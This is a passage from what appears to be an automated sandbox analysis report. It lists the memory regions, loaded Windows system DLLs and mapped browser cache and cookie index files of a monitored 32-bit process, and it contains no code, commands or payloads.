0x75ddffff monitored = 0 entry_point = 0x75ce3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1898 start_va = 0x76ad0000 end_va = 0x76b16fff monitored = 0 entry_point = 0x76ad74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1899 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1900 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1901 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1902 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1903 start_va = 0x280000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1904 start_va = 0x75f20000 end_va = 0x7600ffff monitored = 0 entry_point = 0x75f30569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1905 start_va = 0x74e50000 end_va = 0x74eaffff monitored = 0 entry_point = 0x74e6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1906 start_va = 0x76b60000 end_va = 0x76c0bfff monitored = 0 entry_point = 0x76b6a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1907 start_va = 0x74e40000 end_va = 0x74e4bfff monitored = 0 entry_point = 0x74e410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1908 start_va = 0x76ec0000 end_va = 0x76ed8fff monitored = 0 entry_point = 0x76ec4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1909 start_va = 0x74d20000 end_va = 0x74d31fff monitored = 0 entry_point = 0x74d21200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1910 start_va = 0x76730000 end_va = 0x76824fff monitored = 0 entry_point = 0x76731865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1911 start_va = 0x74f10000 end_va = 0x74f66fff monitored = 0 entry_point = 0x74f29ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1912 start_va = 0x768d0000 end_va = 0x7695ffff monitored = 0 entry_point = 0x768e6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1913 start_va = 0x76010000 end_va = 0x7610ffff monitored = 0 entry_point = 0x7602b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1914 start_va = 0x76110000 end_va = 0x761affff monitored = 0 entry_point = 0x761249e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1915 start_va = 0x76720000 end_va = 0x76729fff monitored = 0 entry_point = 0x767236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1916 start_va = 0x76a30000 end_va = 0x76accfff monitored = 0 entry_point = 0x76a63fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1917 start_va = 0x75de0000 end_va = 0x75f15fff monitored = 0 entry_point = 0x75de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1918 start_va = 0x761b0000 end_va = 0x7630bfff monitored = 0 entry_point = 0x761fba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1919 start_va = 0x76da0000 end_va = 0x76e2efff monitored = 0 entry_point = 0x76da3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1920 start_va = 0x76c10000 end_va = 0x76d30fff monitored = 0 entry_point = 0x76c1158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1921 start_va = 0x76830000 end_va = 0x7683bfff monitored = 0 entry_point = 0x7683238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1922 start_va = 0x76510000 end_va = 0x7670afff monitored = 0 entry_point = 0x765122d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1923 start_va = 0x74de0000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74de37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 1924 start_va = 0x74ff0000 end_va = 0x75c39fff monitored = 0 entry_point = 0x75071601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1925 start_va = 0x74dc0000 end_va = 0x74ddbfff monitored = 0 entry_point = 0x74dca431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1926 start_va = 0x76840000 end_va = 0x76845fff monitored = 0 entry_point = 0x76841782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1927 start_va = 0x74db0000 end_va = 0x74db6fff monitored = 0 entry_point = 0x74db128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1928 start_va = 0x76b20000 end_va = 0x76b54fff monitored = 0 entry_point = 0x76b2145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1929 start_va = 0x74ca0000 end_va = 0x74ce3fff monitored = 0 entry_point = 0x74cb63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1930 start_va = 0x300000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1931 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1932 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1933 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1934 start_va = 0x74eb0000 end_va = 0x74f0ffff monitored = 0 entry_point = 0x74ec158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1935 start_va = 0x76960000 end_va = 0x76a2bfff monitored = 0 entry_point = 0x7696168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1936 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1937 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1938 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 1939 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1940 start_va = 0x1e40000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 1941 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1942 start_va = 0x74b00000 end_va = 0x74c9dfff monitored = 0 entry_point = 0x74b2e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1943 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1944 start_va = 0x230000 end_va = 0x231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1945 start_va = 0x1f30000 end_va = 0x21fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1946 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 1947 start_va = 0x74da0000 end_va = 0x74daafff monitored = 0 entry_point = 0x74da1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1948 start_va = 0x240000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1949 start_va = 0x300000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 1950 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1951 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1952 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1953 start_va = 0x310000 end_va = 0x317fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 1954 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 1955 start_va = 0x74ad0000 end_va = 0x74af0fff monitored = 0 entry_point = 0x74ad145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1956 start_va = 0x74f70000 end_va = 0x74fb4fff monitored = 0 entry_point = 0x74f711e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1957 start_va = 0x772d0000 end_va = 0x772d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 1958 start_va = 0x330000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1959 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1960 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1961 start_va = 0x74a70000 end_va = 0x74ac1fff monitored = 0 entry_point = 0x74a714be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 1962 start_va = 0x74d70000 end_va = 0x74d84fff monitored = 0 entry_point = 0x74d712de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 1963 start_va = 0x74a60000 end_va = 0x74a6cfff monitored = 0 entry_point = 0x74a61326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 1964 start_va = 0x390000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 1965 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1966 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1967 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1968 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1969 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1970 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1971 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 1972 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1973 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1974 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1975 start_va = 0x370000 end_va = 0x370fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 1976 start_va = 0x74a50000 end_va = 0x74a55fff monitored = 0 entry_point = 0x74a5125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 1977 start_va = 0x5c0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1978 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1979 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1980 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1981 start_va = 0x74a30000 end_va = 0x74a46fff monitored = 0 entry_point = 0x74a31c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1982 start_va = 0x764e0000 end_va = 0x7650efff monitored = 0 entry_point = 0x764e2a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1983 start_va = 0x749f0000 end_va = 0x74a2efff monitored = 0 entry_point = 0x749f2351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 1984 start_va = 0x749e0000 end_va = 0x749effff monitored = 0 entry_point = 0x749e38c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 1985 start_va = 0x2900000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1986 start_va = 0x2a20000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 1987 start_va = 0x2900000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1988 start_va = 0x2a10000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 1989 start_va = 0x749d0000 end_va = 0x749d5fff monitored = 0 entry_point = 0x749d14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1990 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1991 start_va = 0x737a0000 end_va = 0x737a8fff monitored = 0 entry_point = 0x737a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1992 start_va = 0x3e0000 end_va = 0x3e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 1993 start_va = 0x1e40000 end_va = 0x1e7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 1994 start_va = 0x1ef0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1995 start_va = 0x74990000 end_va = 0x749cbfff monitored = 0 entry_point = 0x7499145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1996 start_va = 0x2900000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 1997 start_va = 0x74980000 end_va = 0x74984fff monitored = 0 entry_point = 0x749815df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 1998 start_va = 0x74970000 end_va = 0x74975fff monitored = 0 entry_point = 0x74971673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 1999 start_va = 0x74930000 end_va = 0x74967fff monitored = 0 entry_point = 0x7493990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2000 start_va = 0x2c10000 end_va = 0x2e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 2001 start_va = 0x1e80000 end_va = 0x1ebffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 2002 start_va = 0x2a20000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 2003 start_va = 0x2c00000 end_va = 0x2c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2004 start_va = 0x74910000 end_va = 0x74926fff monitored = 0 entry_point = 0x74913573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2005 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2006 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2007 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2008 start_va = 0x74900000 end_va = 0x74907fff monitored = 0 entry_point = 0x749034d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2009 start_va = 0x3f0000 end_va = 0x3f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2010 start_va = 0x74920000 end_va = 0x74927fff monitored = 0 entry_point = 0x749210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2011 start_va = 0x747d0000 end_va = 0x74807fff monitored = 0 entry_point = 0x747d1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2012 start_va = 0x747b0000 end_va = 0x747c6fff monitored = 0 entry_point = 0x747b35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2013 start_va = 0x74770000 end_va = 0x747acfff monitored = 0 entry_point = 0x747710f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2014 start_va = 0x74750000 end_va = 0x74766fff monitored = 0 entry_point = 0x74753573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2015 start_va = 0x2900000 end_va = 0x293bfff monitored = 0 entry_point = 0x290128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2016 start_va = 0x29d0000 end_va = 0x2a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 2017 start_va = 0x2900000 end_va = 0x293bfff monitored = 0 entry_point = 0x290128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2018 start_va = 0x2900000 end_va = 0x293bfff monitored = 0 entry_point = 0x290128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2019 start_va = 0x2900000 end_va = 0x293bfff monitored = 0 entry_point = 0x290128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2020 start_va = 0x2900000 end_va = 0x293bfff monitored = 0 entry_point = 0x290128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2021 start_va = 0x74710000 end_va = 0x7474afff monitored = 0 entry_point = 0x7471128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2022 start_va = 0x2c10000 end_va = 0x2d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c10000" filename = "" Region: id = 2023 start_va = 0x2df0000 end_va = 0x2e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 2024 start_va = 0x746f0000 end_va = 0x74705fff monitored = 0 entry_point = 0x746f2061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2306 start_va = 0x3f0000 end_va = 0x3f9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2307 start_va = 0x76710000 end_va = 0x76714fff monitored = 0 entry_point = 0x76711438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2308 start_va = 0x2e30000 end_va = 0x302ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e30000" filename = "" Region: id = 2309 start_va = 0x746d0000 end_va = 0x746e1fff monitored = 0 entry_point = 0x746d3271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2310 start_va = 0x2900000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2311 start_va = 0x3030000 end_va = 0x922ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003030000" filename = "" Region: id = 2312 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2313 start_va = 0x600000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 2314 start_va = 0x74650000 end_va = 0x746cffff monitored = 0 entry_point = 0x746637c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2315 start_va = 0x2900000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2316 start_va = 0x2b20000 end_va = 0x2bfefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b20000" filename = "" Region: id = 2317 start_va = 0x74630000 end_va = 0x74642fff monitored = 0 entry_point = 0x74631d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2318 